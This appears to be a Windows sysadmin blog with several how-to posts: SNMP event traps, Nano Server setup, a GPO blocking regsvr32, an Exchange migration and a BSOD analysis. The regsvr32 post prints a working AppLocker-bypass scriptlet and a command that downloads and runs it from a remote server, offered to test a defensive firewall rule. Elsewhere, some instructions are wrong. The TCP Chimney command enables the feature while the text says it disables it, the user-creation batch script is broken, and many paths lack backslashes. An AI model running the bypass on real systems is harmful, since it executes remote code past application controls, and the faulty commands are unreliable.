Sending SNMP Traps of Windows Events

Furthering my build-out for a monitoring solution which includes Observium as the primary SNMP polling system, I am writing an application to handle SNMP traps from my Windows servers.

Most of my servers are Windows 2008 R2 or Windows 2012 R2. With that being said, I can use evntwin.exe on the servers to setup traps for specific event logs on my Windows servers and send them to my trap receiver to further classify and alert/notify.

There are a few steps involved in the overall process here.

Create a Custom Event Log Source

Before I can translate a specific event log entry, I create an event log source DevTrap and use an Event ID of 1000.  This is optional, as you’ll see in the next step you can dig right in and start filtering traps from any existing Event Log sources.

C:>eventcreate /T success /id 1000 /l application /d Test event to be trapped. /so DevTrap

2016-06-14_123757

Translate Events to Traps

Using evntwin.exe, I click on Custom and then Edit >>

2016-06-14_124208

From here, I can navigate the event log tree in the left pane and find my DevTrap source in the Application log.

2016-06-14_124334

Double clicking on the row will give me some properties for the event and allow me to modify when to generate the trap based on number of events within a specific time period.  I left this as default since I’ll be testing manually and this won’t generate hundreds of traps.

2016-06-14_124452

Now the event is listed in the Events to be translated to traps box.  I need to Apply and then Export the trap translations.  If I wanted to add more, I could simply keep going before clicking Apply and Export.

2016-06-14_124506

When the Export dialog box opens, it wants to know where to save the configuration for the translations.  Choose a location that makes sense.  After saving, you can close evntwin.exe program.

2016-06-14_124825

A Look at events.cnf

So the events.cnf file was exported in the previous step.  This file contains commands that will be used with evntcmd.exe to actually process and do something with the translations.  Here is what my file contains thus far.

2016-06-14_124937

The format of the #pragma add line is:

#pragma add <LogName> <SourceName> <EventID> <EventCount> <TimeInterval>

I need to add a trap destination and community to this file:

#pragma ADD_TRAP_DEST public 10.147.204.88

I add the line and save my changes and the file looks as follows.

2016-06-14_125836

Here is a useful table if you want to build the file manually and include the trap destination.  Find more information on the use of evntcmd.exe at Microsoft’s TechNet article.

ADDspecifies that you want to add an event to trap configuration.
DELETEspecifies that you want to remove an event to trap configuration
DELETE_TRAP_DESTspecifies that you do not want trap messages to be sent to a specified host within a community
ADD_TRAP_DESTspecifies that you want trap messages to be sent to a specified host within a community.
CommunityNamespecifies, by name, the community in which trap messages are sent.
HostIDspecifies, by name or IP address, the host to which you want trap messages to be sent
EventLogFilespecifies the file in which the event is recorded
EventSourcespecifies the application that generates the event.
EventIDspecifies the unique number that identifies each event

Using evntcmd.exe

Now that I have the configuration file as needed, I use evntcmd.exe to configure the trap translations and trap destinations.  Run the command from an elevated command prompt.

evntcmd.exe events.cf

Here is what the output looks like after running the command.

2016-06-14_130149

At this point, any event logged in Application as source of DevTrap with ID of 1000 will send a trap to my manager on 10.147.204.88.  I can test this by generating an event and monitoring my trap manager server to make sure I see it come across.

C:>eventcreate /T success /id 1000 /l application /d Test event to be trapped. /so DevTrap

Batch Script Add Windows Users using Netsh

The following batch script will add a group of users to Windows, set no password, and require a password change at first logon.

@echo off
setlocal enabledelayedexpansion

set user1=John Q. Smith
set user2=Jane Doe
set user3=Joe Montana
set user4=Alicia Silverstone

set users=(user1 user2 user3 user4 user5 user6)

for %%u in %users% do (
  echo net user %%u /logonpasswordchg:yes /fullname:"!%%u!" /add
)

Join Nano Server to a Domain

To join my Windows Server 2016 Nano server to my test domain I used the djoin.exe (Domain Join) command.

From a domain controller, or server already joined to my domain, I run the following command.  This will create a file called NANOSERVERTP5 at the location I run the command.

(Change items hilighted in Red)

djoin.exe /provision /domain TESTDOMAIN /machine NANOSERVERTP5 /reuse /savefile .NANOSERVERTP5

2016-04-28_010017

Copy the NANOSERVERTP5 file to C: on the Nano Server.  I temporarily enabled File and Sharing through the Firewall on the Nano Server in order to gain access to the Administrative share, so I could copy it to 192.168.100.50c$.

In order to enter into a remote Powershell session, I needed to make sure I had a trusted host entry for my Nano Server in Web Services Management (WS-Management, or WSMan).  I launched an administrative Powershell shell.  Also, make sure WinRM service is running on the machine you’ll be using (net start winrm).

(Change items hilighted in Red)

Set-Item WSMan:localhostClientTrustedHosts -Value 192.168.100.50 -Concatenate

Accept (Y) the WinRM security prompt.

Start a remote PowerShell session into the Nano Server.

Enter-PSSession -ComputerName 192.168.100.50 -Credential Administrator

Run djoin and specify the location that NANOSERVERTP5 file was copied to; in my case, C:NANOSERVERTP5.

djoin /requestodj /loadfile c:NANOSERVERTP5 /windowspath c:windows /localos

Create Nano Server Image

I was trying to build a Nano Server image (2016 Tech Preview 5) and kept getting the following error:

2016-04-28_120004

Turns out that is because the documentation is not updated and instead of -GuestDrivers it now uses:

  1. -Edition [ Standard | Datacenter]
  2. -DeploymentType [ Guest | Host ]

Running the following updated command works without issue building the image.

(Change items hilighted in Red)

New-NanoServerImage -MediaPath c:tp5iso -BasePath .Base -TargetPath .Nano1Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard

Add Packages

You can add packages to the image that is being built by specifying -Packages [PackageName].

To install IIS, for example:
(Change items hilighted in Red)

New-NanoServerImage -MediaPath c:tp5iso -BasePath .Base -TargetPath .Nano1Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard -Packages Microsoft-NanoServer-IIS-Package

Here’s a listing of the Packages in the Server 2016 TP5 ISO as of this writing.

I used the following command within the Packages directory of the Nano distribution to generate this.

PS C:usersrkreiderdesktopnanobasePackages> gci . -filter *.cab | foreach-object { write-output $_.basename; dism /online /get-packageinfo /packagepath:$_ | select-string Description|Product Name|^Name :; }
  • Microsoft-NanoServer-BootFromWim-Package
    Description : Boot from WIM support
    Name : Boot from WIM support
    Product Name : Microsoft-NanoServer-BootFromWim-Feature-Package
  • Microsoft-NanoServer-Compute-Package
    Description : Hyper-V provides the services that you can use to create and manage virtual machines and their resources. Each virtual machine is a virtualized computer system that operates in an isolated execution environment. This allows you to run multiple operating systems simultaneously.
    Name : Hyper-V
    Product Name : Microsoft-NanoServer-Compute-Feature-Package
  • Microsoft-NanoServer-Containers-Package
    Description : Provides services and tools to create and manage Windows Server Containers and their resources.
    Name : Containers
    Product Name : Microsoft-NanoServer-Containers-Feature-Package
  • Microsoft-NanoServer-DCB-Package
    Description : Data Center Bridging (DCB) is a suite of IEEE standards that are used to enhance Ethernet local area networks by providing hardware-based bandwidth guarantees and transport reliability. Use DCB to help enforce bandwidth allocation on a Converged Network Adapter for offloaded storage traffic such as Internet Small Computer System Interface, RDMA over Converged Ethernet, and Fibre Channel over Ethernet.
    Name : Data Center Bridging
    Product Name : Microsoft-NanoServer-DCB-Feature-Package
  • Microsoft-NanoServer-Defender-Package
    Description : Windows Server Antimalware helps protect your machine from malware.
    Name : Windows Server Antimalware
    Product Name : Microsoft-NanoServer-Defender-Feature-Package
  • Microsoft-NanoServer-DNS-Package
    Description : Domain Name System (DNS) Server provides name resolution for TCP/IP networks. DNS Server is easier to manage when it is installed on the same server as Active Directory Domain Services. If you select the Active Directory
    Domain Services role, you can install and configure DNS Server and Active Directory Domain Services to work together.
    Name : DNS Server
    Product Name : Microsoft-NanoServer-DNS-Feature-Package
  • Microsoft-NanoServer-DSC-Package
    Description : Windows PowerShell Desired State Configuration is a configuration management platform that uses a declarative syntax to express and enact system configuration state.
    Name : Windows PowerShell Desired State Configuration
    Product Name : Microsoft-NanoServer-DSC-Feature-Package
  • Microsoft-NanoServer-FailoverCluster-Package
    Description : Failover Clustering allows multiple servers to work together to provide high availability of server roles. Failover Clustering is often used for File Services, virtual machines, database applications, and mail applications.
    Name : Failover Clustering Service
    Product Name : Microsoft-NanoServer-FailoverCluster-Feature-Package
  • Microsoft-NanoServer-Guest-Package
    Description : Hyper-V guest drivers for using Nano Server as a virtual machine
    Name : Hyper-V guest drivers
    Product Name : Microsoft-NanoServer-Guest-Feature-Package
  • Microsoft-NanoServer-Host-Package
    Description : Support for bare metal deployments
    Name : Bare metal deployment
    Product Name : Microsoft-NanoServer-Host-Feature-Package
  • Microsoft-NanoServer-IIS-Package
    Description : Web Server (IIS) provides a reliable, manageable, and scalable Web application infrastructure.
    Name : Web Server (IIS)
    Product Name : Microsoft-NanoServer-IIS-Feature-Package
  • Microsoft-NanoServer-NPDS-Package
    Description : Network Performance Diagnostics Service (NPDS)
    Name : Network Performance Diagnostics Service (NPDS)
    Product Name : Microsoft-NanoServer-NPDS-Feature-Package
  • Microsoft-NanoServer-OEM-Drivers-Package
    Description : Server Core drivers
    Name : Server Core drivers
    Product Name : Microsoft-NanoServer-OEM-Drivers-Feature-Package
  • Microsoft-NanoServer-SCVMM-Compute-Package
    Description : System Center Virtual Machine Manager Hyper-V agent
    Name : System Center Virtual Machine Manager Hyper-V agent
    Product Name : Microsoft-NanoServer-SCVMM-Compute-Feature-Package
  • Microsoft-NanoServer-SCVMM-Package
    Description : System Center Virtual Machine Manager agent
    Name : System Center Virtual Machine Manager agent
    Product Name : Microsoft-NanoServer-SCVMM-Feature-Package
  • Microsoft-NanoServer-SecureStartup-Package
    Description : Secure Startup support
    Name : Secure Startup support
    Product Name : Microsoft-NanoServer-SecureStartup-Feature-Package
  • Microsoft-NanoServer-ShieldedVM-Package
    Description : Host Guardian provides the features necessary on a Hyper-V server to provision Shielded Virtual Machines.
    Name : Shielded VM support
    Product Name : Microsoft-NanoServer-ShieldedVM-Feature-Package
  • Microsoft-NanoServer-Storage-Package
    Description : File Server role and other storage components
    Name : File Server role and other storage components
    Product Name : Microsoft-NanoServer-Storage-Feature-Package

GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO and named it Firewall:  Block regsvr32 then I edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

2016-04-27_111611

Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard

2016-04-27_111627

Choose Program as the type of rule to create and click Next >

2016-04-27_111642

Use C:windowssystem32regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.

2016-04-27_111651

Choose Block as the action and click Next >

2016-04-27_111659

Apply it to all network locations.

2016-04-27_111717

Give the rule a name and possibly a description.

2016-04-27_111733

Rule to block is now listed in Inbound Rules

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).

backdoor.sct

<?XML version=1.0?>
<scriptlet>
<registration
 progid=Empire
 classid={F0001111-0000-0000-0000-0000FEEDACDC} >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language=JScript>
 <![CDATA[

 var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).

Disable Server 2008 TCP Chimney Offload

TCP Chimney Offload is a networking technology that helps transfer the workload from the CPU to a network adapter during network data transfer. In Windows Server 2008, TCP Chimney Offload enables the Windows networking subsystem to offload the processing of a TCP/IP connection to a network adapter that includes special support for TCP/IP offload processing.

TCP Chimney Offload is available in all versions of Windows Server 2008 and Windows Vista. Both TCP/IPv4 connections and TCP/IPv6 connections can be offloaded if the network adapter supports this feature.

Disable TCP Chimney Offload from command line:

netsh int tcp set global chimney=enabled

The above command disables TCP Chimney Offload for the operating system.

Restrict Access to Only Email/OWA Access

An existing user in a Windows domain was moving companies (to a parent company) that is not part of the infrastructure.  After the employee left his account was to be terminated but still be able to access email only, so no login/remote access to systems, computers on the network.

By disabling the account, this would prevent authentication for Exchange needs so I couldn’t do that.

Create a Security Group

I created a new Security Group, Email Only.

2014-08-06_092620

I added this specific user to the newly created Security Group.

2014-08-06_092640

Create a Group Policy

Next, I created a new Group Policy for the domain and applied it to the Computers OU.

Group Policy:  Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Deny Log on Locally

2014-08-06_092519

I modified Deny Log on Locally policy and added my newly created Security Group, Email Only.

2014-08-06_092818

Testing

To test functionality, I logged on as an administrator to a PC in the domain and ran gpupdate /force.  This updates the group policy on that computer.  Then I logged off and tried logging back on as the user that I added to the Security Distribution Group.  Login failed, so this worked.

Next, I tested OWA, Outlook Anywhere, and Outlook.  I was able to successfully authenticate and send/receive email without an issue.

Now this user has access to OWA and Outlook Anywhere or Outlook without the ability to log on locally to a computer in the domain.

 

Exchange 2003 Transition to Exchange 2013

This post will be updated as time passes and I continue working on this project.

I am setting up a virtual lab to replicate an existing environment which contains Server 2003 Domain Controller/DNS/DHCP and Server 2003 with Exchange 2003.

The goal is to determine the best possible path to transition from Exchange 2003 to Exchange 2013.  The two scenarios I know are an initial transition from Exchange 2003 to Exchange 2010 and then from Exchange 2010 to Exchange 2013.  The other option would be to export individual user mailboxes into PST and import into Exchange 2013.

Phase 1

I will setup a 2008 R2 virtual server to install a 180 day trial of Exchange 2010 and put it into this VM lab environment to start the transition process.  Afterward, remove Exchange 2003 from the domain completely.

Next will be totransition from Exchange 2010 to Exchange 2013 and remove Exchange 2010 from the domain completely.

  • Setup Windows 2003 Domain
  • Setup Windows 2003 + Exchange 2003
  • Install 2008 R2 SP1
  • Install and run Exchange Pre-Deployment Analyzer (2010) (Link)
    • 2014-06-03_144644
    • Raise domain functional level to 2003 native
    • Raise forest functional level to 2003 native
    • Modify Exchange 2003 server and add Registry Key HKLMSystemCurrentControlSetServicesRESvcParameters adding SuppressStateChanges DWORD with value of 1
    • Install .NET 3.5 on 2008 R2 SP1 server for Exchange 2010 pre-requisite
  • Install Exchange 2010 SP3
    • Run setup with the following switches
      • setup.com /PrepareLegacyExchangePermissions
      • setup.com /PrepareSchema
      • setup.com /PrepareAD
      • setup.com /PrepareDomain
    • Start Graphical Setup (setup.exe)
      • 2014-06-03_162222
  • Determine Transition Path from 2003 to 2010 Exchange

Phase 2

Export mailboxes from users.  Remove Exchange 2003 from the domain.  Setup Server 2008 R2 and install Exchange 2013 in the domain.  This phase should be fun.

Windows Server 2012 R2 RTM (CRITICAL_STRUCTURE_CORRUPTION)

Receiving a BSOD on a Windows Server 2012 RTM fresh install processing updates. This is a Hyper-V VM.

2014-05-14_124102

Windbg Analysis

0: kd> .bugcheck
Bugcheck code 00000109
Arguments a3a01f58`921465fa b3b72bde`e4946739 00000000`000001a0 00000000`00000007
0: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

CRITICAL_STRUCTURE_CORRUPTION (109)
This bugcheck is generated when the kernel detects that critical kernel code or
data have been corrupted. There are generally three causes for a corruption:
1) A driver has inadvertently or deliberately modified critical kernel code
 or data. See http://www.microsoft.com/whdc/driver/kernel/64bitPatching.mspx
2) A developer attempted to set a normal kernel breakpoint using a kernel
 debugger that was not attached when the system was booted. Normal breakpoints,
 bp, can only be set if the debugger is attached at boot time. Hardware
 breakpoints, ba, can be set at any time.
3) A hardware corruption occurred, e.g. failing RAM holding kernel code or data.
Arguments:
Arg1: a3a01f58921465fa, Reserved
Arg2: b3b72bdee4946739, Reserved
Arg3: 00000000000001a0, Failure type dependent information
Arg4: 0000000000000007, Type of corrupted region, can be
	0 : A generic data region
	1 : Modification of a function or .pdata
	2 : A processor IDT
	3 : A processor GDT
	4 : Type 1 process list corruption
	5 : Type 2 process list corruption
	6 : Debug routine modification
	7 : Critical MSR modification

Debugging Details:
------------------


PG_MISMATCH:  40000

DEFAULT_BUCKET_ID:  WIN8_DRIVER_FAULT

BUGCHECK_STR:  0x109

PROCESS_NAME:  mscorsvw.exe

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) amd64fre

DPC_STACK_BASE:  FFFFF80049477FB0

STACK_TEXT:
fffff800`494778a8 00000000`00000000 : 00000000`00000109 a3a01f58`921465fa b3b72bde`e4946739 00000000`000001a0 : nt!KeBugCheckEx


STACK_COMMAND:  kb

SYMBOL_NAME:  ANALYSIS_INCONCLUSIVE

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Unknown_Module

IMAGE_NAME:  Unknown_Image

DEBUG_FLR_IMAGE_TIMESTAMP:  0

IMAGE_VERSION:

BUCKET_ID:  BAD_STACK

FAILURE_BUCKET_ID:  BAD_STACK

ANALYSIS_SOURCE:  KM

FAILURE_ID_HASH_STRING:  km:bad_stack

FAILURE_ID_HASH:  {75814664-faf6-4b70-bbc7-dc592132ecdd}

Followup: MachineOwner
---------

Update 1: Applying Security Updates

I decided to apply just Security Updates right now. So far so good.

2014-05-14_130315

After that completed, these are the remaining updates for this pass.

2014-05-14_130441

I will install these on a one-by-one basis.

Interestingly enough, that first update (685KB) failed install; re-checked for updates and there was only one update (9.6MB) so I assume it to have been a roll-up? Anyway it installed fine.

Now, I re-checked updates and I have a Windows 2012 R2 Update (~800MB).

2014-05-14_130725

Working on installing this now.

That update installed, ran check and found additional updates; those installed as well.

One last update remains, 97MB and it installed and rebooted seemingly OK.

2014-05-14_133434

After prompt to restart, got the following error on boot though:

2014-05-14_133309

Booted back into Windows OK but I see the update did not install.

This update is the Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 update rollup: May 2014

Prerequisite indicates KB2919355.

Checking system for KB2919355 shows I have it:

2014-05-14_133720

Re-attempting to install this update.

Resolution

All updates installed, however, still getting a Bugcheck code of 0x109 randomly.